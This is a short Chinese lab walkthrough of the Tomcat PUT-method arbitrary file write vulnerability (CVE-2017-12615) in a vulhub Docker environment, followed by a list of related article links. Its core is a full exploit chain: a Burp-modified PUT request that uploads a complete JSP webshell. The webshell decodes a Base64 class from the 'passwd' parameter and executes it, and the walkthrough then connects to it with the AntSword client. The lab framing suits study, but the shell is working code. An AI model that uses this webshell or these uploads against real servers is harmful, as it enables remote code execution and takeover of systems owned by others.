tomcat put方法任意写文件漏洞
(1)cd vulhub/tomcat/CVE-2017-12615 切换目录。
(2) docker-compose up -d 启动。
(3)访问:http://192.168.43.137:8080/
(4)burpsuite抓包。
(5)send to repeater,修改为PUT /l3yx.txt。
(6) docker exec -it 3e7 bash ; cd webapps/ ;cd ROOT ;cat l3yx.txt进入容器,查看。
(7)上传jsp木马:输入PUT /x.jsp/
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
(8)蚁剑连接。
tomcat put方法任意写文件漏洞相关推荐
- java写文件追加的方法_java写文件追加的方法
BufferedWriter bw = new BufferedWriter(new FileWriter(new File("e:\\testout\\","1111. ...
- 转载:任意下载文件漏洞
edusrc--某985任意文件下载 00demons00 2023-02-26 20:28:24 文章来自于公众号:WK安全 欢迎大家多多支持 免责声明 由于传播.利用WK安全所提供的信息而造成的任 ...
- kesioncms (科讯cms) 6.x-8.x版本写入任意内容文件漏洞
发布时间:2013-04-08 关键词:kesioncms 漏洞 漏洞版本:kesioncms(科讯cms) 6.x - 8.x 漏洞简介:未对提交参数判断,导致可将任意内容的文件写入网站服务器 漏 ...
- 通达OA V11.3 代码审计 (文件上传、文件包含、任意用户登录漏洞)
因为这段时间比较忙,抽出时间写博客很不容易,所以就简单的吧印象笔记里面的内容站上俩,没有写太多具体的分析过程,尽量都在截图中说明了 附件 通达OA11.3源码(未解码,可以自己去下SeayDzend解 ...
- 袁哥写的漏洞研究方法总结
一.前期准备,建立安全模型: 1.熟悉软件功能.功能实现,配置等: 如:IIS的虚拟目录.脚本映射: 2.根据功能,分析安全需求,建立安全模型: IIS外挂,文件类型识别,目录正确识别:目录限制: 外 ...
- thinkphp日志泄漏漏洞_ThinkPHP框架任意代码执行漏洞的利用及其修复方法
ThinkPHP是国内著名的开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的.最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2 ...
- 文件上传漏洞之——漏洞进阶(读文件,写文件,包含图片马,包含日志文件,截断包含)
php协议 PHP带有很多内置URL风格的封装协议,可用于类似fopen().copy(). file_ exists()和filesize()的文件系统函数 file:// 访问本地文件系统 htt ...
- 前台+后台 java下载服务器、本地图片、文件(下载tomcat配置的虚拟路径文件)可指定任意保存路径,SSM框架
背景:一个系统中有web网站与APP两个客户端,两个客户端有分别的后台,共同部署在一个服务器上,APP有一个上传图片.文件的功能,网站端则可以查看.下载APP上传的图片,下载APP上传的文件. 问题: ...
- java写文件方法之比较
import java.io.BufferedOutputStream; import java.io.File; import java.io.FileOutputStream; import ja ...
最新文章
- 6月11号=》121页-125页
- java final private_java – private final static属性vs private final属性
- BZOJ1833:[ZJOI2010]数字计数——题解
- BZOJ 3105:[cqoi2013]新Nim游戏
- 朋友公司招聘用的一套C#基础面试题,10个码农8个错2个蒙,我也跳坑了…
- Spring Async和Java的8 CompletableFuture
- php配置文件加载顺序,php extension 加载顺序问题
- Bootstrap学习一
- jenkins的简介与安装
- 疫中行,程序员可在家免费学这些!
- android AT指令获取SIM卡ICCID
- 数据管理与数据治理的区别
- VMware Pro 虚拟机+Unlocker v3.0补丁+ MacOs 10.14.4最新版苹果系统懒人版镜像 一键部署 【全部免积分】
- 密码编码学与网络安全-------原理与实践(第七版)
- 2020ICPC昆明热身赛 C.Statues(前缀优化dp+滚动数组优化空间)
- Python | Web Crawler
- maven下载Nexus私服jar包,报错Not authorized
- EPP-域名映射(RFC5731翻译)
- 51单片机系列--闪烁灯,呼吸灯与流水灯
- 最近整理的一些常见的面试题,面试大全,黑马程序员面试宝典题库---最新技术--篇